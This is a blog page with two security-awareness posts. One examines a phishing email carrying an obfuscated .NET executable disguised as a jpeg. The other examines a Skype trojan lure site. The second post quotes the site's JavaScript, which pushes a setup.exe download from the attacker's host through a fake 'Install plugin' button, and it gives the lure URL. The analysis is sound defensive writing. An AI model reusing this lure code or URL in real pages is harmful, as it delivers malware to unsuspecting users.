Tag Archives

2 Articles

Avoid getting hacked 2 – Suspicious Emails

Posted by Malisa Ncube on

Problem

This morning I received a very interesting email. It urged me to process a purchasing order and had a couple of attachments in it.

Most computer users would probably just download the attachments, double-click and proceed to open. This particular one is very interesting in that it managed to escape the anti-virus application and seemed really legitimate. This is an email which you may receive in your company and you simply open it without knowing what it may do. So I set out to look at it a little deeper.

The following is the screenshot of the email

Would you think this email may be a beginning of a cyber-attack? Well… It could be.

As anyone would do I opened the attachments and found the following. A zipped executable file with a fake jpeg extension as part of the name – I was careful not to run the executable. The rest of the attachments were useless pdf with schematics and some Iranian addresses.

Investigation

I fired-up my PEBrowser and tried to inspect the contents of “Technical Data Specifications jpeg.exe”. The result was as follows.

I realised it’s a .NET application compiled with 3.5 framework. You can see that it imports the Microsoft Runtime Execution Engine library – mscoree.dll which is part of the .NET framework. It also clearly shows .NET methods section which has 274 Methods and 49 classes. It was indeed and executable file and I made effort to inspect the IL quickly.

It was obfuscated to prevent people like me from trying to understand what is happening under the hood. I tried using dotPeek to decompile it and search for anything suspicious like PInvokes. Because of obfuscation I could not tell the logic very well even through PEBrowser. The IL was confusing because the most names had been scrambled to incomprehensible strings. I then saw this.

There is PInvoke to the Kernel32.dll. The program does interact with the system copying files – which in this case I don’t know.

There is quite a lot of logic in this application and not clear what it does, it probably does something very harmful. I’m sure it is not designed to give you Christmas gifts or sing you a lullaby.

I wonder why this was allowed to propagate into my email client. Is it because its a .NET program and Antivirus applications “trust” it? Given that it runs on .NET 3.5 the surface area of attack is very wide, which is good news for the attacker.

So next time you open an email, check carefully for the kind of attachments as you could be a victim of hacking.

Looks like the days of “I love you” worm are back, but exploiting .NET rather than VBS.

I found this link to be good for non-technical people
http://www.businessinsider.com/how-to-avoid-being-hacked-2015-4

Avoid getting-hacked – Watch out for trojans

Posted by Malisa Ncube on

Earlier today, I received a message on Skype on my PC from a friend.

Malisa Ncube video: http://24onlineskyvideo.in.ua/video/?n=Malisa%20Ncube 🙂

The message came through a contact on Skype, who I suspect has infected his PC. On clicking the link, one would see a screen like this below.

It quite deceptive in that, it pretends to be buffering the video and the play button in the center glows like any common video you can play. It was quite suspicious for me in that moment because I was accessing internet from a restricted network which does not allow videos, YouTube, and other social networks. I was curious, so I clicked the play button. The site pretended to be loading and then displayed the following message.

This was even more interesting because, I wondered what plugin I need to run this video. My first assumption was that when I click on the Install plugin… button it would redirect me to Adobe.com and enable me to install flash before redirecting back to the site, but No. Clicking on the link downloads a setup.exe file which you don’t know what it may do to your PC.

Lets get back to the beginning and look at the address bar. It reads

http://24onlineskyvideo.in.ua/video/?n=Malisa%20Ncube

so I tried a couple of things. I changed it to

http://24onlineskyvideo.in.ua/video/?n=Saggy%20Pants

and you may already suspect what happened. The initial impression is that of a video personalised to you, but by changing the url to Saggy Pants, it will be dedicated to Mr Saggy Pants. Now lets look at the source.

The code that presents the install button is as follows

            <div id="cap">
                <p><img src="images/icon.png?id=5"></p>
                <p>A plugin is needed to display this video</p>
                <p><button onclick="nw()">&nbsp;Install plugin...&nbsp;</button></p>
            </div>

By clicking on the button you invoke the nw() function shown below. The entire site is made up of one HTML file with javascript embedded and the truth is there is no video to talk about here. The player you see on the first page is drawn by a CSS style.

        var nw=function(){

            var b="http://"+location.hostname+"/setup.exe";
            if(navigator.userAgent.toLowerCase().indexOf('chrome')>-1){
                ___newWindow=window.open("data:text/html,"+encodeURIComponent("<html><head><script>window.location.href='about:blank';\x3c/script></head></html>"),"__dFrame");window.setTimeout(function(){var a=window.document.createElement("script");a.type="text/javascript";a.text="window.location.href='"+b+"'";___newWindow.document.head.appendChild(a)},100)
            }
            else
                setTimeout(function(){
                        location.href=b;
                },100)


            ga('send', 'pageview', '/d');


        }; 

I also noticed the developer of the site is interested in analytics of his site. So he embedded some google analytics on it as follows.

There is also a comment box below which look like it will post the comment to your facebook account. The code is shown below. Check the data-href 🙂

        <div id="comments">
            <div style="position:absolute;top:0;right:0;width:100%;height:400px;z-index:9999"></div>
            <div id="fb-root"></div>
            <script>(function(d, s, id) {
              var js, fjs = d.getElementsByTagName(s)[0];
              if (d.getElementById(id)) return;
              js = d.createElement(s); js.id = id;
              js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.0";
              fjs.parentNode.insertBefore(js, fjs);
            }(document, 'script', 'facebook-jssdk'));</script>
                    </div>
            <div class="fb-comments" data-href="http://knowyourmeme.com/videos/106730-like-a-boss" data-width="1000" data-numposts="5" data-colorscheme="light"></div>

        </div> 

NOTE: So next time you open a link, it is important to ensure that it does not prompt you to download some setup file that will possibly enable the hacker to gain access to your PC, or spread through your Skype application sending messages to your contacts.